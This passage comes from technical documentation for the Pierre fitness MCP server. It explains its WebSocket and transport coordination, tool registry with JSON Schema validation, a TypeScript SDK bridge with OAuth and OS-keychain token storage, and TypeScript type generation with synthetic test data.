- Bidirectional: Full-duplex client ↔ server communication
- JWT authentication: Required before subscribing
- Topic-based subscriptions: Clients choose what to receive
- Broadcast channels: tokio::sync::broadcast for efficient distribution
- Connection tracking: HashMap<Uuid, ClientConnection> with RwLock
- Automatic cleanup: Connections removed on disconnect
- Periodic updates: System stats every 30 seconds
Use cases:
- Real-time API usage monitoring
- Rate limit status updates
- System health dashboards
- Live fitness data streaming
- OAuth flow status updates
Rust Idiom: WebSocket connection splitting
The ws.split() pattern separates the WebSocket into independent read and write halves. This allows concurrent sending/receiving without conflicts. The mpsc::unbounded_channel bridges the write half to the message handler, decoupling message generation from socket I/O.
Transport Coordination
The TransportManager starts all transports concurrently:
Source: src/mcp/transport_manager.rs:41-53, 130-152
#![allow(unused)]
fn main() {
/// Start all transport methods (HTTP, SSE, WebSocket) in coordinated fashion
///
/// # Errors
/// Returns an error if transport setup or server startup fails
pub async fn start_all_transports(&self, port: u16) -> AppResult<()> {
info!(
"Transport manager coordinating all transports on port {}",
port
);
// Delegate to the unified server implementation
self.start_legacy_unified_server(port).await
}
/// Unified server startup using existing transport coordination
async fn start_legacy_unified_server(&self, port: u16) -> AppResult<()> {
info!("Starting MCP server with HTTP transports (Axum framework)");
let sse_notification_receiver = self.notification_sender.subscribe();
let mut resources_clone = (*self.resources).clone();
resources_clone.set_oauth_notification_sender(self.notification_sender.clone());
Self::spawn_progress_handler(&mut resources_clone);
let shared_resources = Arc::new(resources_clone);
Self::spawn_sse_forwarder(shared_resources.clone(), sse_notification_receiver);
Self::run_http_server_loop(shared_resources, port).await
}
}
Concurrency: Transports run in separate tokio::spawn tasks, allowing simultaneous HTTP, SSE, and WebSocket clients.
Notification Broadcasting
The broadcast::channel distributes notifications to subscribed transports:
#![allow(unused)]
fn main() {
let (notification_sender, _) = broadcast::channel(100);
// Subscribe for SSE transport
let sse_notification_receiver = self.notification_sender.subscribe();
// Send notification (from OAuth callback)
notification_sender.send(OAuthCompletedNotification {
provider: "strava",
status: "success",
user_id
})?;
}
Rust Idiom: broadcast::channel for pub-sub
The broadcast::channel allows multiple subscribers. When a notification is sent, all active subscribers receive it. This is perfect for distributing OAuth completion events to SSE and WebSocket transports simultaneously.
Key Takeaways
- Transport abstraction: MCP protocol is transport-agnostic. Same JSON-RPC messages work over stdio, HTTP, SSE, and WebSocket.
- Stdio transport: Native Rust implementation using BufReader for stdin, supports MCP Sampling for server-initiated LLM requests, runs concurrently with HTTP/SSE.
- HTTP transport: REST endpoints with Axum framework for web clients, with CORS and rate limiting support.
- SSE for notifications: Server-Sent Events provide unidirectional server→client notifications for OAuth completion and progress updates. SSE routes are implemented in src/sse/routes.rs.
- WebSocket transport: Full-duplex bidirectional communication with JWT authentication, topic-based subscriptions, and real-time updates. Supports usage monitoring, system stats broadcasting every 30 seconds, and live data streaming.
- WebSocket message types: Tagged enum with Authentication, Subscribe, UsageUpdate, SystemStats, Error, and Success variants for type-safe messaging.
- Connection management: WebSocketManager tracks authenticated clients in HashMap<Uuid, ClientConnection> with RwLock for concurrent access.
- Broadcast notifications: tokio::sync::broadcast distributes notifications to all active transports simultaneously.
- Concurrent transports: All transports run in separate tokio::spawn tasks, allowing simultaneous stdio, HTTP, SSE, and WebSocket clients.
- Shared resources: Arc<ServerResources> provides thread-safe access to database, auth manager, and other services across transports.
- Error isolation: Each transport handles errors independently. HTTP failure doesn’t affect stdio, SSE, or WebSocket transports.
- Auto-recovery: HTTP transport restarts on failure with exponential backoff (5s, 10s).
- Transport-agnostic processing: McpRequestProcessor handles requests identically regardless of transport source.
- WebSocket splitting: ws.split() pattern separates read/write halves for concurrent bidirectional communication without conflicts.
- MCP Sampling: Stdio transport supports server-initiated LLM requests via SamplingPeer, enabling Pierre to request completions from connected MCP clients.
Next Chapter: Chapter 12: MCP Tool Registry & Type-Safe Routing - Learn how the Pierre platform registers MCP tools, validates parameters with JSON Schema, and routes tool calls to handlers.
Chapter 12: MCP Tool Registry & Type-Safe Routing
Tool Registry Overview
Pierre registers all MCP tools at startup using a centralized registry:
Source: src/mcp/schema.rs
#![allow(unused)]
fn main() {
pub fn get_tools() -> Vec<ToolSchema> {
create_fitness_tools()
}
/// Create all fitness provider tool schemas (47 tools in 8 categories)
fn create_fitness_tools() -> Vec<ToolSchema> {
vec![
// Connection tools (3)
create_connect_provider_tool(),
create_get_connection_status_tool(),
create_disconnect_provider_tool(),
// Core fitness tools (4)
create_get_activities_tool(),
create_get_athlete_tool(),
create_get_stats_tool(),
create_get_activity_intelligence_tool(),
// Analytics tools (14)
create_analyze_activity_tool(),
create_calculate_metrics_tool(),
// ... more analytics tools
// Configuration tools (10)
create_get_configuration_catalog_tool(),
// ... more configuration tools
// Nutrition tools (5)
create_calculate_daily_nutrition_tool(),
// ... more nutrition tools
// Sleep & Recovery tools (5)
create_analyze_sleep_quality_tool(),
// ... more sleep tools
// Recipe Management tools (7)
create_get_recipe_constraints_tool(),
// ... more recipe tools
]
}
}
Registry pattern: Single get_tools() function returns all available tools. This ensures tools/list and tools/call use the same definitions.
See tools-reference.md for the complete list of 47 tools.
Tool Schema Structure
Each tool has a name, description, and JSON Schema for parameters:
Source: src/mcp/schema.rs:57-67
#![allow(unused)]
fn main() {
/// MCP Tool Schema Definition
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ToolSchema {
/// Tool name identifier
pub name: String,
/// Human-readable tool description
pub description: String,
/// JSON Schema for tool input parameters
#[serde(rename = "inputSchema")]
pub input_schema: JsonSchema,
}
}
Fields:
name: Unique identifier (e.g., “get_activities”)description: Human-readable explanation for AI assistantsinputSchema: JSON Schema defining required/optional parameters
JSON Schema for Validation
JSON Schema describes parameter structure:
Source: src/mcp/schema.rs:69-81
#![allow(unused)]
fn main() {
/// JSON Schema Definition
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct JsonSchema {
/// Schema type (e.g., "object", "string")
#[serde(rename = "type")]
pub schema_type: String,
/// Property definitions for object schemas
#[serde(skip_serializing_if = "Option::is_none")]
pub properties: Option<HashMap<String, PropertySchema>>,
/// List of required property names
#[serde(skip_serializing_if = "Option::is_none")]
pub required: Option<Vec<String>>,
}
}
Example tool schema (conceptual):
{
"name": "get_activities",
"description": "Fetch fitness activities from connected providers",
"inputSchema": {
"type": "object",
"properties": {
"provider": {
"type": "string",
"description": "Provider name (strava, garmin, etc.)"
},
"limit": {
"type": "number",
"description": "Maximum activities to return"
}
},
"required": ["provider"]
}
}
Parameter Validation
MCP servers validate tool parameters against inputSchema before execution. Invalid parameters return error code -32602 (Invalid params).
Validation rules:
- Required parameters must be present
- Parameter types must match schema
- Unknown parameters may be ignored or rejected
- Nested objects validated recursively
Tool Handler Routing
Tool calls route to handler functions based on tool name. The full flow from Chapter 10 through 12:
tools/call request
│
▼
Extract tool name and arguments
│
▼
Look up tool in registry (Chapter 12)
│
▼
Validate arguments against inputSchema (Chapter 12)
│
▼
Route to handler function (Chapter 10)
│
▼
Execute with authentication (Chapter 6)
│
▼
Return ToolResponse
Key Takeaways
- Centralized registry: get_tools() returns all available tools for both tools/list and tools/call.
- JSON Schema validation: inputSchema defines required/optional parameters with types.
- Type safety: Rust types ensure schema correctness at compile time.
- Dynamic registration: Adding a new tool only requires updating the create_fitness_tools() vector.
- Parameter extraction: Tools parse the arguments JSON using serde deserialization.
- Error codes: Invalid parameters return -32602 per the JSON-RPC spec.
- Tool discovery: AI assistants call tools/list to learn available functionality.
- Schema-driven UX: Good descriptions and schemas help AI assistants use tools correctly.
End of Part III: MCP Protocol
You’ve completed the MCP protocol implementation section. You now understand:
- JSON-RPC 2.0 foundation (Chapter 9)
- MCP request flow and processing (Chapter 10)
- Transport layers (stdio, HTTP, SSE) (Chapter 11)
- Tool registry and JSON Schema validation (Chapter 12)
Next Chapter: Chapter 13: SDK Bridge Architecture - Begin Part IV by learning how the TypeScript SDK communicates with the Rust MCP server via stdio transport.
Chapter 13: SDK Bridge Architecture
This chapter explores how the TypeScript SDK bridges MCP hosts (like Claude Desktop) to the Pierre server, translating between stdio (MCP standard) and HTTP (Pierre’s transport).
SDK Bridge Pattern
The SDK acts as a transparent bridge between MCP hosts and Pierre server:
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ Claude │ stdio │ SDK │ HTTP │ Pierre │
│ Desktop │◄───────►│ Bridge │◄───────►│ Server │
│ (MCP Host) │ │ (TypeScript)│ │ (Rust) │
└──────────────┘ └──────────────┘ └──────────────┘
│ │ │
│ tools/list │ GET /mcp/tools │
├────────────────────────►├────────────────────────►│
│ │ │
│ tools (JSON-RPC) │ HTTP 200 │
│◄────────────────────────┼◄────────────────────────┤
Source: sdk/src/bridge.ts:70-84
export interface BridgeConfig {
pierreServerUrl: string;
jwtToken?: string;
apiKey?: string;
oauthClientId?: string;
oauthClientSecret?: string;
userEmail?: string;
userPassword?: string;
callbackPort?: number;
disableBrowser?: boolean;
tokenValidationTimeoutMs?: number;
proactiveConnectionTimeoutMs?: number;
proactiveToolsListTimeoutMs?: number;
toolCallConnectionTimeoutMs?: number;
}
Configuration:
- pierreServerUrl: Pierre HTTP endpoint (e.g., http://localhost:8081)
- jwtToken / apiKey: Pre-existing authentication
- oauthClientId / oauthClientSecret: OAuth app credentials
- userEmail / userPassword: Login credentials
- callbackPort: OAuth callback listener port
OAuth Client Provider
The SDK implements OAuth 2.0 client for Pierre authentication:
Source: sdk/src/bridge.ts:113-150
class PierreOAuthClientProvider implements OAuthClientProvider {
private serverUrl: string;
private config: BridgeConfig;
private clientInfo: OAuthClientInformationFull | undefined = undefined;
private savedTokens: OAuthTokens | undefined = undefined;
private codeVerifierValue: string | undefined = undefined;
private stateValue: string | undefined = undefined;
private callbackServer: any = undefined;
private authorizationPending: Promise<any> | undefined = undefined;
private callbackPort: number = 0;
private callbackSessionToken: string | undefined = undefined;
// Secure token storage using OS keychain
private secureStorage: SecureTokenStorage | undefined = undefined;
private allStoredTokens: StoredTokens = {};
// Client-side client info storage (client info is not sensitive, can stay in file)
private clientInfoPath: string;
constructor(serverUrl: string, config: BridgeConfig) {
this.serverUrl = serverUrl;
this.config = config;
// Initialize client info storage path
const os = require('os');
const path = require('path');
this.clientInfoPath = path.join(os.homedir(), '.pierre-mcp-client-info.json');
// NOTE: Secure storage initialization is async, so it's deferred to start()
// to avoid race conditions with constructor completion
// See initializePierreConnection() for the actual initialization
// Load client info from storage (synchronous, non-sensitive)
this.loadClientInfo();
this.log(`OAuth client provider created for server: ${serverUrl}`);
this.log(`Using OS keychain for secure token storage (will initialize on start)`);
this.log(`Client info storage path: ${this.clientInfoPath}`);
}
OAuth flow:
1. Discovery: Fetch /.well-known/oauth-authorization-server for endpoints
2. Registration: Register OAuth client with Pierre (RFC 7591)
3. Authorization: Open browser to /oauth/authorize
4. Callback: Listen for OAuth callback on localhost
5. Token exchange: POST to /oauth/token with authorization code
6. Token storage: Save to OS keychain (macOS Keychain, Windows Credential Manager, Linux Secret Service)
Secure Token Storage
The SDK stores OAuth tokens in OS-native secure storage:
Source: sdk/src/bridge.ts:59-68
interface StoredTokens {
pierre?: OAuthTokens & { saved_at?: number };
providers?: Record<string, {
access_token: string;
refresh_token?: string;
expires_at?: number;
token_type?: string;
scope?: string;
}>;
}
Storage locations:
- macOS: Keychain (security command-line tool)
- Windows: Credential Manager (Windows Credential Store API)
- Linux: Secret Service API (libsecret)
Security: Tokens never stored in plaintext files. OS-native encryption protects credentials.
MCP Host Integration
The SDK integrates with MCP hosts via stdio transport:
Source: sdk/src/bridge.ts:13-16
import { Client } from '@modelcontextprotocol/sdk/client/index.js';
import { Server } from '@modelcontextprotocol/sdk/server/index.js';
import { StdioServerTransport } from '@modelcontextprotocol/sdk/server/stdio.js';
import { StreamableHTTPClientTransport } from '@modelcontextprotocol/sdk/client/streamableHttp.js';
Components:
- Server: MCP server exposed to the host via stdio
- StdioServerTransport: stdio transport for MCP host communication
- Client: MCP client connecting to Pierre
- StreamableHTTPClientTransport: HTTP transport for the Pierre connection
Message Routing
The SDK routes messages bidirectionally:
Claude Desktop → Server (stdio) → Client (HTTP) → Pierre
Claude Desktop ← Server (stdio) ← Client (HTTP) ← Pierre
Request flow:
1. MCP host sends JSON-RPC to SDK’s stdio (e.g., tools/call)
2. SDK’s Server receives via StdioServerTransport
3. SDK’s Client forwards to Pierre via StreamableHTTPClientTransport
4. Pierre processes and returns JSON-RPC response
5. SDK’s Client receives HTTP response
6. SDK’s Server sends JSON-RPC to MCP host via stdio
Automatic OAuth Handling
The SDK handles OAuth flows transparently:
Source: sdk/src/bridge.ts:48-57
// Define custom notification schema for Pierre's OAuth completion notifications
const OAuthCompletedNotificationSchema = z.object({
method: z.literal('notifications/oauth_completed'),
params: z.object({
provider: z.string(),
success: z.boolean(),
message: z.string(),
user_id: z.string().optional()
}).optional()
});
OAuth notifications:
1. Pierre sends notifications/oauth_completed via SSE
2. SDK receives the notification and updates stored tokens
3. Future requests use refreshed tokens automatically
Key Takeaways
- Bridge pattern: SDK translates stdio (MCP standard) <-> HTTP (Pierre transport).
- OAuth client: Full OAuth 2.0 implementation with discovery, registration, and token exchange.
- Secure storage: OS-native keychain for token storage (never plaintext files).
- Transparent integration: MCP hosts (Claude Desktop) connect via stdio without knowing about the HTTP backend.
- Bidirectional routing: Messages flow in both directions through the SDK bridge.
- Automatic token refresh: SDK handles token expiration and refresh transparently.
- MCP SDK: Built on the official @modelcontextprotocol/sdk for standards compliance.
Next Chapter: Chapter 14: Type Generation & Tools-to-Types - Learn how Pierre generates TypeScript types from Rust tool definitions for type-safe SDK development.
Chapter 14: Type Generation & Tools-to-Types System
This chapter explores Pierre’s automated type generation system that converts Rust tool schemas to TypeScript interfaces, ensuring type safety between the server and SDK. You’ll learn about schema-driven development, synthetic data generation for testing, and the complete tools-to-types workflow.
Type Generation Overview
Pierre generates TypeScript types directly from server tool schemas:
┌──────────────┐ tools/list ┌──────────────┐ generate ┌──────────────┐
│ Rust Tool │──────────────►│ JSON Schema │───────────►│ TypeScript │
│ Definitions │ (runtime) │ (runtime) │ (script) │ Interfaces │
└──────────────┘ └──────────────┘ └──────────────┘
src/mcp/ inputSchema sdk/src/types.ts
schema.rs properties
Single Source of Truth: Rust definitions generate both runtime API and TypeScript types
Key insight: Tool schemas defined in Rust become the single source of truth for both runtime validation and TypeScript type safety.
Tools-to-Types Script
The type generator fetches schemas from a running Pierre server and converts them to TypeScript:
Source: scripts/generate-sdk-types.js:1-16
#!/usr/bin/env node
// ABOUTME: Auto-generates TypeScript type definitions from Pierre server tool schemas
// ABOUTME: Fetches MCP tool schemas and converts them to TypeScript interfaces for SDK usage
const http = require('http');
const fs = require('fs');
const path = require('path');
/**
* Configuration
*/
const SERVER_URL = process.env.PIERRE_SERVER_URL || 'http://localhost:8081';
const SERVER_PORT = process.env.HTTP_PORT || '8081';
const OUTPUT_FILE = path.join(__dirname, '../sdk/src/types.ts');
const JWT_TOKEN = process.env.PIERRE_JWT_TOKEN || null;
Configuration:
- SERVER_URL: Pierre server endpoint (default: localhost:8081)
- OUTPUT_FILE: Generated TypeScript output (sdk/src/types.ts)
- JWT_TOKEN: Optional authentication for protected servers
Fetching Tool Schemas
The script calls tools/list to retrieve all tool schemas:
Source: scripts/generate-sdk-types.js:20-74
/**
* Fetch tool schemas from Pierre server
*/
async function fetchToolSchemas() {
return new Promise((resolve, reject) => {
const requestData = JSON.stringify({
jsonrpc: '2.0',
id: 1,
method: 'tools/list',
params: {}
});
const options = {
hostname: 'localhost',
port: SERVER_PORT,
path: '/mcp',
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Content-Length': Buffer.byteLength(requestData),
...(JWT_TOKEN ? { 'Authorization': `Bearer ${JWT_TOKEN}` } : {})
}
};
const req = http.request(options, (res) => {
let data = '';
res.on('data', (chunk) => {
data += chunk;
});
res.on('end', () => {
if (res.statusCode !== 200) {
reject(new Error(`Server returned ${res.statusCode}: ${data}`));
return;
}
try {
const parsed = JSON.parse(data);
if (parsed.error) {
reject(new Error(`MCP error: ${JSON.stringify(parsed.error)}`));
return;
}
resolve(parsed.result.tools || []);
} catch (err) {
reject(new Error(`Failed to parse response: ${err.message}`));
}
});
});
req.on('error', (err) => {
reject(new Error(`Failed to connect to server: ${err.message}`));
});
req.write(requestData);
req.end();
});
}
Fetch flow:
1. JSON-RPC request: POST to /mcp with tools/list method
2. Authentication: Include JWT token if available
3. Parse response: Extract result.tools array
4. Error handling: Validate status code and JSON-RPC errors
JSON Schema to TypeScript Conversion
The core conversion logic maps JSON Schema types to TypeScript:
Source: scripts/generate-sdk-types.js:79-127
/**
* Convert JSON schema property to TypeScript type
*/
function jsonSchemaToTypeScript(property, propertyName, required = false) {
if (!property) {
return 'any';
}
const isOptional = !required;
const optionalMarker = isOptional ? '?' : '';
// Handle type arrays (e.g., ["string", "null"])
if (Array.isArray(property.type)) {
const types = property.type
.filter(t => t !== 'null')
.map(t => jsonSchemaToTypeScript({ type: t }, propertyName, true));
const typeStr = types.length > 1 ? types.join(' | ') : types[0];
return property.type.includes('null') ? `${typeStr} | null` : typeStr;
}
switch (property.type) {
case 'string':
if (property.enum) {
return property.enum.map(e => `"${e}"`).join(' | ');
}
return 'string';
case 'number':
case 'integer':
return 'number';
case 'boolean':
return 'boolean';
case 'array':
if (property.items) {
const itemType = jsonSchemaToTypeScript(property.items, propertyName, true);
return `${itemType}[]`;
}
return 'any[]';
case 'object':
if (property.properties) {
return generateInterfaceFromProperties(property.properties, property.required || []);
}
if (property.additionalProperties) {
const valueType = jsonSchemaToTypeScript(property.additionalProperties, propertyName, true);
return `Record<string, ${valueType}>`;
}
return 'Record<string, any>';
case 'null':
return 'null';
default:
return 'any';
}
}
Type mapping:
- string -> string (with enum support for union types)
- number / integer -> number
- boolean -> boolean
- array -> T[] (with item type inference)
- object -> inline interface or Record<string, T>
- Union types: ["string", "null"] -> string | null
TypeScript Idioms: Union Types and Literal Types
Union types for enums:
Source: scripts/generate-sdk-types.js:98-100
case 'string':
if (property.enum) {
return property.enum.map(e => `"${e}"`).join(' | ');
}
Example generated type:
provider: "strava" | "fitbit" | "garmin" // from enum in JSON Schema
This is idiomatic TypeScript: literal union types, rather than enum, provide better type narrowing and inline values.
Interface Generation
The script generates named interfaces for each tool’s parameters:
Source: scripts/generate-sdk-types.js:185-205
const paramTypes = tools.map(tool => {
const interfaceName = `${toPascalCase(tool.name)}Params`;
const description = tool.description ? `\n/**\n * ${tool.description}\n */` : '';
if (!tool.inputSchema || !tool.inputSchema.properties || Object.keys(tool.inputSchema.properties).length === 0) {
return `${description}\nexport interface ${interfaceName} {}\n`;
}
const properties = tool.inputSchema.properties;
const required = tool.inputSchema.required || [];
const fields = Object.entries(properties).map(([name, prop]) => {
const isRequired = required.includes(name);
const tsType = jsonSchemaToTypeScript(prop, name, isRequired);
const optional = isRequired ? '' : '?';
const propDescription = prop.description ? `\n /** ${prop.description} */` : '';
return `${propDescription}\n ${name}${optional}: ${tsType};`;
});
return `${description}\nexport interface ${interfaceName} {\n${fields.join('\n')}\n}\n`;
}).join('\n');
Generated output example (sdk/src/types.ts:69-81):
/**
* Get fitness activities from a provider
*/
export interface GetActivitiesParams {
/** Maximum number of activities to return */
limit?: number;
/** Number of activities to skip (for pagination) */
offset?: number;
/** Fitness provider name (e.g., 'strava', 'fitbit') */
provider: string;
}
Naming convention: tool_name -> ToolNameParams (PascalCase conversion)
Type-Safe Tool Mapping
The script generates a union type of all tool names and parameter mapping:
Source: scripts/generate-sdk-types.js:237-253
const toolNamesUnion = `
// ============================================================================
// TOOL NAME TYPES
// ============================================================================
/**
* Union type of all available tool names
*/
export type ToolName = ${tools.map(t => `"${t.name}"`).join(' | ')};
/**
* Map of tool names to their parameter types
*/
export interface ToolParamsMap {
${tools.map(t => ` "${t.name}": ${toPascalCase(t.name)}Params;`).join('\n')}
}
`;
Generated output (sdk/src/types.ts - conceptual):
export type ToolName = "get_activities" | "get_athlete" | "get_stats" | /* 42 more... */;
export interface ToolParamsMap {
"get_activities": GetActivitiesParams;
"get_athlete": GetAthleteParams;
"get_stats": GetStatsParams;
// ... 42 more tools
}
Type safety benefit: TypeScript can validate tool names and infer correct parameter types at compile time.
Common Data Types
The generator includes manually-defined domain types for fitness data:
Source: scripts/generate-sdk-types.js:265-309
/**
* Fitness activity data structure
*/
export interface Activity {
id: string;
name: string;
type: string;
distance?: number;
duration?: number;
moving_time?: number;
elapsed_time?: number;
total_elevation_gain?: number;
start_date?: string;
start_date_local?: string;
timezone?: string;
average_speed?: number;
max_speed?: number;
average_cadence?: number;
average_heartrate?: number;
max_heartrate?: number;
average_watts?: number;
kilojoules?: number;
device_watts?: boolean;
has_heartrate?: boolean;
calories?: number;
description?: string;
trainer?: boolean;
commute?: boolean;
manual?: boolean;
private?: boolean;
visibility?: string;
flagged?: boolean;
gear_id?: string;
from_accepted_tag?: boolean;
upload_id?: number;
external_id?: string;
achievement_count?: number;
kudos_count?: number;
comment_count?: number;
athlete_count?: number;
photo_count?: number;
map?: {
id?: string;
summary_polyline?: string;
polyline?: string;
};
[key: string]: any;
}
Design choice: While tool parameter types are auto-generated, domain types like Activity, Athlete, and Stats are manually maintained for stability and documentation.
Running Type Generation
Invoke the generator via npm script:
Source: sdk/package.json:14
"scripts": {
"generate-types": "node ../scripts/generate-sdk-types.js"
}
Workflow:
# 1. Start Pierre server (required - provides tool schemas)
cargo run --bin pierre-mcp-server
# 2. Generate types from running server
cd sdk
npm run generate-types
# 3. Generated output: sdk/src/types.ts (45+ tool interfaces)
Output example:
Pierre SDK Type Generator
==============================
Fetching tool schemas from http://localhost:8081/mcp...
Fetched 47 tool schemas
Generating TypeScript definitions...
Writing to sdk/src/types.ts...
Successfully generated types for 47 tools!
Generated interfaces:
- ConnectToPierreParams
- ConnectProviderParams
- GetActivitiesParams
... (42 more)
Type generation complete!
Import types in your code:
import { GetActivitiesParams, Activity } from './types';
Synthetic Data Generation
Pierre includes a synthetic data generator for testing without OAuth connections:
Source: tests/helpers/synthetic_data.rs:11-35
#![allow(unused)]
fn main() {
/// Builder for creating synthetic fitness activity data
///
/// Provides deterministic, reproducible generation of realistic fitness activities
/// for testing intelligence algorithms without requiring real OAuth connections.
///
/// # Examples
///
/// ```
/// use tests::synthetic_data::SyntheticDataBuilder;
/// use chrono::Utc;
///
/// let builder = SyntheticDataBuilder::new(42); // Deterministic seed
/// let activity = builder.generate_run()
/// .duration_minutes(30)
/// .distance_km(5.0)
/// .start_date(Utc::now())
/// .build();
/// ```
#[derive(Debug, Clone)]
pub struct SyntheticDataBuilder {
// Reserved for future algorithmic tests requiring seed reproducibility verification
#[allow(dead_code)]
seed: u64,
rng: ChaCha8Rng,
}
}
Key features:
- Deterministic: Seeded RNG (ChaCha8Rng) ensures reproducible test data
- Builder pattern: Fluent API for constructing activities
- Realistic data: Generates physiologically plausible metrics
Rust Idioms: Builder Pattern for Test Data
Source: tests/helpers/synthetic_data.rs:47-67
#![allow(unused)]
fn main() {
impl SyntheticDataBuilder {
/// Create new builder with deterministic seed for reproducibility
#[must_use]
pub fn new(seed: u64) -> Self {
Self {
seed,
rng: ChaCha8Rng::seed_from_u64(seed),
}
}
/// Generate a synthetic running activity
#[must_use]
#[allow(clippy::missing_const_for_fn)] // Cannot be const: uses &mut self.rng
pub fn generate_run(&mut self) -> ActivityBuilder<'_> {
ActivityBuilder::new(SportType::Run, &mut self.rng)
}
/// Generate a synthetic cycling activity
#[must_use]
#[allow(clippy::missing_const_for_fn)] // Cannot be const: uses &mut self.rng
pub fn generate_ride(&mut self) -> ActivityBuilder<'_> {
ActivityBuilder::new(SportType::Ride, &mut self.rng)
}
}
}
Rust idioms:
- #[must_use]: Ensures builder methods aren’t called without using the result
- Borrowing &mut self.rng: Shares RNG state across builders without cloning
- Clippy pragmas: Document why const fn isn’t applicable (mutable state)
Training Pattern Generation
The builder generates realistic training patterns for testing intelligence algorithms:
Source: tests/helpers/synthetic_data.rs:69-132
#![allow(unused)]
fn main() {
/// Generate a series of activities following a specific pattern
#[must_use]
pub fn generate_pattern(&mut self, pattern: TrainingPattern) -> Vec<Activity> {
match pattern {
TrainingPattern::BeginnerRunnerImproving => self.beginner_runner_improving(),
TrainingPattern::ExperiencedCyclistConsistent => self.experienced_cyclist_consistent(),
TrainingPattern::Overtraining => self.overtraining_scenario(),
TrainingPattern::InjuryRecovery => self.injury_recovery(),
}
}
/// Beginner runner improving 35% over 6 weeks
/// Realistic progression for new runner building fitness
fn beginner_runner_improving(&mut self) -> Vec<Activity> {
let mut activities = Vec::new();
let base_date = Utc::now() - Duration::days(42); // 6 weeks ago
// Week 1-2: 3 runs/week, 20 min @ 6:30/km pace
for week in 0..2 {
for run in 0..3 {
let date = base_date + Duration::days(week * 7 + run * 2);
let activity = self
.generate_run()
.duration_minutes(20)
.pace_min_per_km(6.5)
.start_date(date)
.heart_rate(150, 165)
.build();
activities.push(activity);
}
}
// Week 3-4: 4 runs/week, 25 min @ 6:00/km pace (improving)
for week in 2..4 {
for run in 0..4 {
let date = base_date + Duration::days(week * 7 + (run * 2));
let activity = self
.generate_run()
.duration_minutes(25)
.pace_min_per_km(6.0)
.start_date(date)
.heart_rate(145, 160)
.build();
activities.push(activity);
}
}
// Week 5-6: 4 runs/week, 30 min @ 5:30/km pace (improved 35%)
for week in 4..6 {
for run in 0..4 {
let date = base_date + Duration::days(week * 7 + (run * 2));
let activity = self
.generate_run()
.duration_minutes(30)
.pace_min_per_km(5.5)
.start_date(date)
.heart_rate(140, 155)
.build();
activities.push(activity);
}
}
activities
}
}
Pattern characteristics:
- Realistic progression: 35% improvement over 6 weeks (physiologically plausible)
- Gradual adaptation: Increasing volume (20->25->30 min) and intensity (6.5->6.0->5.5 min/km)
- Heart rate efficiency: Lower HR at faster paces indicates improved fitness
Synthetic Provider for Testing
The synthetic provider implements the FitnessProvider trait without OAuth:
Source: tests/helpers/synthetic_provider.rs:16-75
#![allow(unused)]
fn main() {
/// Synthetic provider for testing intelligence algorithms without OAuth
///
/// Provides pre-loaded activity data for automated testing, allowing
/// validation of metrics calculations, trend analysis, and predictions
/// without requiring real API connections or OAuth tokens.
///
/// # Thread Safety
///
/// All data access is protected by `RwLock` for thread-safe concurrent access.
/// Multiple tests can safely use the same provider instance.
pub struct SyntheticProvider {
/// Pre-loaded activities for testing
activities: Arc<RwLock<Vec<Activity>>>,
/// Activity lookup by ID for fast access
activity_index: Arc<RwLock<HashMap<String, Activity>>>,
/// Provider configuration
config: ProviderConfig,
}
impl SyntheticProvider {
/// Create a new synthetic provider with given activities
#[must_use]
pub fn with_activities(activities: Vec<Activity>) -> Self {
// Build activity index for O(1) lookup by ID
let mut index = HashMap::new();
for activity in &activities {
index.insert(activity.id.clone(), activity.clone());
}
Self {
activities: Arc::new(RwLock::new(activities)),
activity_index: Arc::new(RwLock::new(index)),
config: ProviderConfig {
name: "synthetic".to_owned(),
auth_url: "http://localhost/synthetic/auth".to_owned(),
token_url: "http://localhost/synthetic/token".to_owned(),
api_base_url: "http://localhost/synthetic/api".to_owned(),
revoke_url: None,
default_scopes: vec!["activity:read_all".to_owned()],
},
}
}
/// Create an empty provider (no activities)
#[must_use]
pub fn new() -> Self {
Self::with_activities(Vec::new())
}
/// Add an activity to the provider dynamically
pub fn add_activity(&self, activity: Activity) {
{
let mut activities = self
.activities
.write()
.expect("Synthetic provider activities RwLock poisoned");
{
let mut index = self
.activity_index
.write()
.expect("Synthetic provider index RwLock poisoned");
index.insert(activity.id.clone(), activity.clone());
} // Drop index early
activities.push(activity);
} // RwLock guards dropped here
}
}
}
Design patterns:
- Arc<RwLock<T>>: Thread-safe shared ownership with interior mutability
- Dual indexing: Vec for ordering + HashMap for O(1) ID lookups
- Early lock release: Explicit scopes drop RwLock guards before the outer scope ends
Rust Idioms: RwLock Scoping
Source: tests/helpers/synthetic_provider.rs:84-101
#![allow(unused)]
fn main() {
pub fn add_activity(&self, activity: Activity) {
{
let mut activities = self
.activities
.write()
.expect("Synthetic provider activities RwLock poisoned");
{
let mut index = self
.activity_index
.write()
.expect("Synthetic provider index RwLock poisoned");
index.insert(activity.id.clone(), activity.clone());
} // Drop index early
activities.push(activity);
} // RwLock guards dropped here
}
}
Idiom: Nested scopes force early lock release. The inner index write lock drops before updating activities, preventing unnecessary lock contention.
Why this matters: Holding multiple locks simultaneously can cause deadlocks. Explicit scoping ensures locks are released in a well-defined order.
Type Safety Guarantees
The tools-to-types system provides multiple layers of type safety:
┌─────────────────────────────────────────────────────────────┐
│ TYPE SAFETY LAYERS │
├─────────────────────────────────────────────────────────────┤
│ 1. Rust Schema Definitions (compile-time) │
│ - ToolSchema struct enforces valid JSON Schema │
│ - Serde validates serialization correctness │
├─────────────────────────────────────────────────────────────┤
│ 2. JSON-RPC Runtime Validation │
│ - Server validates arguments against inputSchema │
│ - Invalid params return -32602 error code │
├─────────────────────────────────────────────────────────────┤
│ 3. TypeScript Interface Generation (build-time) │
│ - Generated types match server schemas exactly │
│ - TypeScript compiler validates SDK usage │
├─────────────────────────────────────────────────────────────┤
│ 4. Synthetic Testing (test-time) │
│ - Deterministic data validates algorithm correctness │
│ - No OAuth dependencies for unit tests │
└─────────────────────────────────────────────────────────────┘
Schema-Driven Development Workflow
The complete workflow ensures server and client stay synchronized:
┌────────────────────────────────────────────────────────────┐
│ SCHEMA-DRIVEN WORKFLOW │
└────────────────────────────────────────────────────────────┘
1. Define tool in Rust (src/mcp/schema.rs)
|
pub fn create_get_activities_tool() -> ToolSchema { ... }
2. Add to tool registry (src/mcp/schema.rs)
|
pub fn get_tools() -> Vec<ToolSchema> {
vec![create_get_activities_tool(), ...]
}
3. Start Pierre server
|
cargo run --bin pierre-mcp-server
4. Generate TypeScript types
|
